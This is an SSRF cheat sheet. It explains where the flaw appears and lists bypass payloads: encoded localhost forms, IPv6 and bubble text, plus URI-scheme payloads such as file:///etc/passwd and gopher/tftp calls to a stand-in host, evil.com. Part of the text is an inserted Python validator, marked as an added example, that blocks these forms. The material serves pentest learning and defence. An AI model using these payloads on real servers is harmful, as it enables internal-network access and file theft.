Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery (SSRF) is a web application vulnerability that lets an attacker make the vulnerable server issue outgoing requests of the attacker's choosing, typically reaching hosts that the server can access but the attacker cannot.

Where to find

It is usually found in requests that carry a URL the server will fetch on the user's behalf, for example:

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

  1. Basic payload

    http://127.0.0.1:1337
    http://localhost:1337
    

  2. Hex encoding

    http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
    

  3. Octal encoding

    http://127.0.0.1 -> http://0177.0.0.01
    

  4. Dword encoding

    http://127.0.0.1 -> http://2130706433
    

  5. Mixed encoding

    http://127.0.0.1 -> http://0177.0.0.0x1
    

  6. Using URL encoding

    http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
    

  7. Using IPv6

    http://0000::1:1337/
    http://[::]:1337/
    

  8. Using bubble text

    http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
    
    Generate it with https://capitalizemytitle.com/bubble-text-generator/
    

How to exploit (URI Scheme)

  1. File scheme

    file:///etc/passwd
    

  2. Dict scheme

    dict://127.0.0.1:1337/
    

  3. FTP scheme

    ftp://127.0.0.1/
    

  4. TFTP scheme

    tftp://evil.com:1337/test
    

  5. SFTP scheme

    sftp://evil.com:1337/test
    

  6. LDAP scheme

    ldap://127.0.0.1:1337/
    

  7. Gopher scheme

    gopher://evil.com/_Test%0ASSRF
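Added example, not part of the original cheat sheet: a defender-side validator in Python for the URL a server is about to fetch. It serves both lists above: it rejects every scheme except http/https, and it canonicalizes the host so that the hex, octal, dword, mixed, percent-encoded, IPv6 and circled-letter forms from the first list all collapse to the address they actually name before the internal-range check. The function names and the minimal localhost-only name list are my own assumptions.

```python
import ipaddress
import unicodedata
from urllib.parse import unquote, urlsplit


def parse_legacy_ipv4(host):
    """Decode inet_aton-style literals (hex, octal, dword, mixed, 1-4 parts) to an address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    nums = []
    for p in parts:
        base = 16 if p[:2].lower() == "0x" else 8 if len(p) > 1 and p[0] == "0" else 10
        try:
            nums.append(int(p[2:] if base == 16 else p, base))
        except ValueError:
            return None
    value = 0
    for n in nums[:-1]:  # every part but the last is a single octet
        if n > 255:
            return None
        value = (value << 8) | n
    tail_bits = 8 * (5 - len(nums))  # the last part fills the remaining bytes
    if nums[-1] >> tail_bits:
        return None
    return ipaddress.IPv4Address((value << tail_bits) | nums[-1])


def check_outbound_url(url):
    """Return (allowed, reason, canonical_host) for a URL the server is asked to fetch."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https"):  # no file:, dict:, gopher:, ftp:, ...
        return False, "scheme not allowed", None
    # Percent-decode and NFKC-fold (circled letters become ASCII) before deciding anything
    host = unicodedata.normalize("NFKC", unquote(parts.hostname or "")).rstrip(".").lower()
    if not host:
        return False, "missing host", None
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # plain dotted quad or IPv6 such as ::1 / ::
        except ValueError:
            ip = None
    if ip is not None:
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified:
            return False, "internal address literal", str(ip)
        return True, "public address literal", str(ip)
    if host == "localhost" or host.endswith(".localhost"):  # minimal local-name list (assumed)
        return False, "name for this machine", host
    return True, "hostname: resolve and re-check each record", host  # DNS answers need the same test
```

A plain hostname that passes here still has to be resolved, and every A/AAAA answer must go through the same address test; connect to the checked address rather than the name so an answer that changes between check and connect cannot slip past.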
    

References